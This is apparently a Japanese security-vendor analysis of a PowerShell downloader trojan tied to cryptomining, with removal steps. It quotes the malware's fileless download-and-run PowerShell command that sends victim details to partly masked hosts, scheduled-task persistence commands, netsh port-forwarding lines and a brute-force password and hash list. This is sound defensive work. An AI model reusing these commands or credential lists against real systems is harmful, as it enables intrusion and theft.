解析者: Arvin Roi Macaraeg   
 更新者 : Patrick Angelo Roderno

 別名:

TrojanDownloader:PowerShell/Credcalper (MICROSOFT); HEUR:Trojan.PowerShell.Generic (KASPERSKY); Mal/PSDL-J (SOPHOS)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
    なし

  • 感染報告の有無 :
    はい

  概要

感染経路 インターネットからのダウンロード

トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。

マルウェアは、他のファイルのダウンロードや削除を担うPowerShellスクリプトです。マルウェアは、さまざまな手法で拡散する悪意のある仮想通貨発掘活動に関与しています。

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

マルウェアは、特定の脆弱性を利用した感染活動を実行します。

  詳細

ファイルサイズ 3,122,543 bytes
メモリ常駐 なし
発見日 2019年3月12日
ペイロード URLまたはIPアドレスに接続, 情報収集

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

  • %AppDataLocal%\kkk1.log
  • %AppDataLocal%\pp2.log
  • %AppDataLocal%\333.log
  • %AppDataLocal%\kk4.log
  • %AppDataLocal%\kk5.log

(註:%AppDataLocal%フォルダは、ローカルアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\<ユーザ名>\AppData\Local" です。)

マルウェアは、以下のプロセスを追加します。

  • powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" +
    "&mac={MAC Address}&av={List of AV Products}&version={OS Version}&bit={OS Architecture}&flag2=
    False&domain={Domain Name}&user={Username}&PS={If Powershell-Enabled}" + "')" + '""

マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。

  • Global\powerv5

情報漏えい

マルウェアは、以下の情報を収集します。

  • OS Version
  • MAC Address
  • List of AV products from the victim's machine
  • OS Architecture
  • Username
  • Domain Name

その他

マルウェアは、以下の脆弱性を利用して感染活動を実行します。

<補足>
インストール

マルウェアは、以下のプロセスを追加します。

  • powershell Start-Process -FilePath cmd.exe -ArgumentList "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX (New-Object Net.WebClient).downloadstring('" + "http://down.{BLOCKED}h.com/newol.dat?allv5" +  "&mac={MACアドレス}&av={ウイルス対策製品の一覧}&version={OSのバージョン}&bit={OSアーキテクチャ}&flag2= False&domain={ドメイン名}&user={ユーザ名}&PS={Powershellが実行可能な場合}" + "')" + '""

情報漏えい

マルウェアは、以下の情報を収集します。

  • OSのバージョン
  • MACアドレス
  • ウイルス対策製品の一覧(感染コンピュータから)
  • オペレーティング・システム(OS)アーキテクチャ
  • ユーザ名
  • ドメイン名

その他

マルウェアは、以下を実行します。

  • PingCastleスキャナを使用して、標的とする脆弱なコンピュータを特定します。
  • 総当たり攻撃の実行が可能です。マルウェアは、以下の認証情報を使用します。
    • ユーザ名:
      • administrator
    • パスワード:
      • 123456
      • password
      • PASSWORD
      • football
      • welcome
      • 1
      • 12
      • 21
      • 123
      • 321
      • 1234
      • 12345
      • 123123
      • 123321
      • 111111
      • 654321
      • 666666
      • 121212
      • 0
      • 222222
      • 888888
      • 1111
      • 555555
      • 1234567
      • 12345678
      • 123456789
      • 987654321
      • admin
      • abc123
      • abcd1234
      • abcd@1234
      • abc@123
      • p@ssword
      • P@ssword
      • p@ssw0rd
      • P@ssw0rd
      • P@SSWORD
      • P@SSW0RD
      • P@$$w0rd
      • P@$$word
      • P@$$w0rd
      • iloveyou
      • monkey
      • login
      • passw0rd
      • master
      • hello
      • qazwsx
      • password1
      • qwerty
      • baseball
      • qwertyuiop
      • superman
      • 1qaz2wsx
      • fuckyou
      • 123qwe
      • zxcvbn
      • pass
      • aaaaaa
      • love
      • administrator
    • パスワードのハッシュ:
      • 32ed87bdb5fdc5e9cba88547376818d4
      • 8846f7eaee8fb117ad06bdd830b7586c
      • 7b592e4f8178b4c75788531b2e747687
      • 31fc0dc8f7dfad0e8bd7ccc3842f2ce9
      • 674e48b68c5cd0efd8f7e5faa87b3d1e
      • 69943c5e63b4d2c104dbbcc15138b72b
      • 588feb889288fb953b5f094d47d1565c
      • bcdf115fd9ba99336c31e176ee34b304
      • 3dbde697d71690a769204beb12283678
      • df54de3f3438343202c1dd523d0265be
      • 7ce21f17c0aee7fb9ceba532d0546ad6
      • 7a21990fcd3d759941e45c490f143d5f
      • 579110c49145015c47ecd267657d3174
      • af27efb60c7b238910efe2a7e0676a39
      • 2d7f1a5a61d3a96fb5159b5eef17adc6
      • 4057b60b514c5402dde3d29a1845c366
      • e8cd0e4a9e89eab931dc5338fcbec54a
      • 6920c58d0df184d829189c44fafb7ece
      • 3fa45a060bd2693ae4c05b601d05ca0c
      • ba07ba35933e5bf42dea4af8add09d1e
      • f1351ac828428d74f6da2968089fc91f
      • e84d037613721532e6b6d84d215854b6
      • 2f2d544c53b3031f24d63402ea7fb4f9
      • 328727b81ca05805a68ef26acb252039
      • 259745cb123a52aa2e693aaacca2db52
      • c22b315c040ae6e0efee3518d830362b
      • 162e829be112225fedf856e38e1c65fe
      • 209c6174da490caeb422f3fa5a7ae634
      • f9e37e83b83c47a93c2f09f66408631b
      • b3ec3e03e2a202cbd54fd104b8504fef
      • 4ed91524cb54eaacc17a185646fb7491
      • aa647b916a1fad374df9c30711d58a7a
      • a80c9cc3f8439ada25af064a874efe2d
      • 13b29964cc2480b4ef454c59562e675c
      • de26cce0356891a4a020e7c4957afc72
      • e19ccf75ee54e06b06a5907af13cef42
      • 30fcaa8ad9a496b3e17f7fbfacc72993
      • 41630abb825ca50da31ce1fac1e9f54d
      • f56a8399599f1be040128b1dd9623c29
      • 2e4dbf83aa056289935daea328977b20
      • f56a8399599f1be040128b1dd9623c29
      • b963c57010f218edc2cc3c229b5e4d0f
      • f2477a144dff4f216ab81f2ac3e3207d
      • e6bd4cdb1e447131b60418f31d0b81d6
      • b9f917853e3dbf6e6831ecce60725930
      • 6d3986e540a63647454a50e26477ef94
      • 066ddfd4ef0e9cd7c256fe77191ef43c
      • 152efbcfafeb22eabda8fc5e68697a41
      • 5835048ce94ad0564e29a924a03510ef
      • 2d20d252a479f485cdf5e171d93985bf
      • 320a78179516c385e35a93ffa0b1c4ac
      • 0d757ad173d2fc249ce19364fd64c8ec
      • 72f5cfa80f07819ccbcfb72feb9eb9b7
      • f67f5e3f66efd7298be6acd32eeeb27c
      • 1c4ecc8938fb93812779077127e97662
      • ad70819c5bc807280974d80f45982011
      • a836ef24f0a529688be2af1479a95411
      • 36aa83bdcab3c9fdaf321ca42a31c3fc
      • acb98fd0478427cd18949050c5e87b47
      • 85deeec2d12f917783b689ae94990716
      • a4141712f19e9dd5adf16919bb38a95c
  • 以下のURLのコンテンツをダウンロードしてメモリ内で実行します。
    • http://p.{BLOCKED}h.com/upgrade.php?ver=3&mac={MACアドレス}&av={ウイルス対策製品の一覧}
      &ver={OSのバージョン}&bit={OSアーキテクチャ}
    • http://{BLOCKED}.{BLOCKED}.107.137/status.json?allv5&mac={MACアドレス}&av={ウイルス対策製品の一覧} &version={OSのバージョン}&bit={OSアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS= {Powershellが実行可能な場合}&{感染の状況報告}&{マルウェアのディレクトリ\マルウェアのファイル名}
  • Pass-the-Hash攻撃の実行が可能です。成功すると、マルウェアは以下を行います。
    • ファイル%User Startup%\run.batが存在する場合、%User Startup%\run.batを削除します。
    • 以下のファイルを作成します:
      • %Application Data%\sign.txt
      • %Application Data%\flashplayer.tmp
      • %User Startup%\FlashPlayer.lnk
  • マルウェアは、作成されたログファイルの存在を確認します。以下のファイルが存在しない場合、適切な動作を実行します。
    • kkk1.logが存在しない場合:
      • 管理者権限がある場合:
        • 悪意のあるコードをダウンロードして実行するため、以下のURLに接続します。
          • http://v.{BLOCKED}h.net/g?h{date of infection in the format 'yyMMdd'}
        • スケジュールされたタスクを作成します:
          • タスク名: \Microsoft\windows\{MACアドレス}
          • Action: powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?h{date of infection in the format 'yyMMdd'}]
      • 上記以外では:
        • 悪意のあるコードをダウンロードして実行するために以下のURLに接続します。
          • http://v.{BLOCKED}h.net/g?l{date of infection in the format 'yyMMdd'}
      • スケジュールされたタスクを作成します:
        • タスク名: {MACアドレス}
        • Action: powershell -nop -ep bypass -e [malicious code from http://v.{BLOCKED}h.net/g?l{date of infection in the format 'yyMMdd'}]
  • pp2.logが存在しない場合:
    • ディレクトリの作成: %Application Data%\Microsoft ファイル%Application Data%\ Microsoft \ cred.ps1の存在を確認します。存在しない場合は、悪意のあるファイルをダウンロードし%Application Data%\Microsoft\cred.ps1として保存するため以下のURLに接続します。
      • http://down.{BLOCKED}h.com/new.dat?allv5&mac={MACアドレス}&av={ウイルス対策製品の一覧}&version={OSのバージョン}&bit={OSアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={Powershellが実行可能な場合}
      • スケジュールされたタスクを作成し実行します:
        • タスク名: Credentials
        • Action: powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
    • 333.logが存在しない場合:
      • 悪意のあるファイルをダウンロードして%AppDataLocal%\mn.exeとして保存するため、以下のURLに接続します。
        • http://down.{BLOCKED}h.com/mn.dat?allv5&mac={MACアドレス}&av={ウイルス対策製品の一覧}&version={OSのバージョン}&bit={OSアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={Powershellが実行可能な場合}
      • %AppDataLocal%\mn.exeの実行
    • kk4.logが存在しない場合:
      • 悪意のあるファイルをダウンロードして%AppDataLocal%\{ランダムな4-8文字}.exeとして保存するために以下のURLに接続します。
        • http://down.{BLOCKED}h.com/ii.dat?p=allv5&mac={MACアドレス}&av={ウイルス対策製品の一覧}&version={OSのバージョン}&bit={OSアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={Powershellが実行可能な場合}
      • 以下を実行します:
        • 管理者権限がある場合:
          • スケジュールされたタスクを作成します:
            • タスク名: \Microsoft\Windows\{ランダムな4-8文字}
            • Action: %AppDataLocal%\{ランダムな4-8文字}.exe
        • 上記以外では:
          • ダウンロードしたファイルの自動実行機能に使用するスクリプトファイル%AppDataLocal%\ run.vbsを作成します。
          • スケジュールされたタスクを作成します:
            • タスク名: {ランダムな4-8文字}
            • Action: %AppDataLocal%\run.vbs
        • kk5.logが存在しない場合:
          • 悪意のあるファイルをダウンロードし %AppDataLocal%\ddd.exeとして保存するため、以下のURLに接続します。
            • http://down.{BLOCKED}h.com/ddd.dat?allv5&mac={MACアドレス}&av={ウイルス対策製品の一覧}&version={OSのバージョン}&bit={OSアーキテクチャ}&flag2=False&domain={ドメイン名}&user={ユーザ名}&PS={Powershellが実行可能な場合}
          • %AppDataLocal%\ddd.exeの実行
      • 総当たり攻撃の実行に成功すると、マルウェアは、以下を行います。
        • 以下のプロセスを実行します:
          • netsh.exe firewall add portopening tcp 65533 DNS
          • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
        • スケジュールされたタスクを作成します:
          • タスク名: \Microsoft\windows\Bluetooths
          • アクション: powershell -nop -ep bypass -e {base64でエンコードされたコマンド}

  •   対応方法

    対応検索エンジン: 9.850
    初回 VSAPI パターンバージョン 14.920.05
    初回 VSAPI パターンリリース日 2019年4月5日
    VSAPI OPR パターンバージョン 14.921.00
    VSAPI OPR パターンリリース日 2019年4月6日

    手順 1

    Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

    手順 2

    このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

    手順 3

    「Trojan.PS1.PCASTLE.B」で検出したファイル名を確認し、そのファイルを終了します。

    [ 詳細 ]

    • すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
    • 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
      セーフモードについては、こちらをご参照下さい。
    • 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

    手順 4

    スケジュールされたタスクを削除する

    タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。

    • \Microsoft\windows\{MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?h{date of infection in the format 'yyMMdd'}]
    • {MAC Address} - powershell -nop -ep bypass -e [malicious code from http://v.y6h.net/g?l{date of infection in the format 'yyMMdd'}]
    • Credentials - powershell -nop -w hidden -ep bypass -f %Application Data%\Microsoft\cred.ps1
    • \Microsoft\Windows\{random 4-8 characters} - %AppDataLocal%\{random 4-8 characters}.exe
    • {random 4-8 characters} - %AppDataLocal%\run.vbs
    • \Microsoft\windows\Bluetooths - powershell -nop -ep bypass -e {base64-encoded command}

    Windows 2000、Windows XP、Windows Server 2003の場合:

    1. [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
    2. 上記の{タスク名} を、[名前]の欄に入力します。
    3. 入力した{タスク名} 持つファイルを右クリックします。
    4. [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
    5. 上記の{実行するタスク}と文字列が一致するタスクを削除します。

    Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:

    1. Windowsタスクスケジューラを開きます。
      • Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
      • Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。
    2. 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
    3. 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
    4. 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
    5. 文字列が一致するタスクを削除します。

    手順 5

    以下のファイルを検索し削除します。

    [ 詳細 ]
    コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
    • %AppDataLocal%\kkk1.log
    • %AppDataLocal%\pp2.log
    • %AppDataLocal%\333.log
    • %AppDataLocal%\kk4.log
    • %AppDataLocal%\kk5.log
    • %AppDataLocal%\mn.exe
    • %AppDataLocal%\{random 4-8 characters}.exe
    • %AppDataLocal%\run.vbs
    • %AppDataLocal%\ddd.exe
    • %Application Data%\sign.txt
    • %Application Data%\flashplayer.tmp
    • %Application Data%\Microsoft\cred.ps1
    • %User Startup%\FlashPlayer.lnk

    手順 6

    最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.PS1.PCASTLE.B」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


    ご利用はいかがでしたか? アンケートにご協力ください